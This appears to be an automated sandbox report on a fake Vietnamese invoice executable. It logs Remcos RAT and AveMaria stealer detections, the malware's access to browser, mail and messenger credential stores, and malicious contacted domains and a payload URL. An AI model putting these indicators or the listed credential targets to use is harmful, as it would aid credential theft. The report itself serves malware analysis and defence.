Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dwn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10002933 cpuid

12_2_10002933

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_10002264

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_0041739B GetVersionExW,

14_2_0041739B

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: aspnet_compiler.exe PID: 4884, type: MEMORYSTR

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Yara detected Credential Stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.43.12	l-0003.l-dc-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
194.5.98.244	obologs.work.gd	Netherlands	208476	DANILENKODE	true
144.76.136.153	transfer.sh	Germany	24940	HETZNER-ASDE	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
l-0003.l-dc-msedge.net	13.107.43.12	true
geoplugin.net	178.237.33.50	true
ip-api.com	208.95.112.1	true
obologs.work.gd	194.5.98.244	true
transfer.sh	144.76.136.153	true
icanhazip.com	104.18.114.97	true
kpf0yw.am.files.1drv.com	unknown	unknown
onedrive.live.com	unknown	unknown
208.168.6.0.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
obologs.work.gd	true	Avira URL Cloud: phishing	unknown
https://transfer.sh/get/J59PTO/Cuhcxlcg.exe	false		high

AV Detection

Antivirus detection for URL or domain

Source: obologs.work.gd

Avira URL Cloud: Label: phishing

Multi AV Scanner detection for submitted file

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	ReversingLabs: Detection: 27%
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Virustotal: Detection: 30%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for domain / URL

Source: obologs.work.gd

Virustotal: Detection: 14%

Perma Link

Machine Learning detection for sample

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 12.0.aspnet_compiler.exe.400000.0.unpack

Avira: Label: BDS/Backdoor.Gen

Source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Uses 32bit PE files

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2

Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

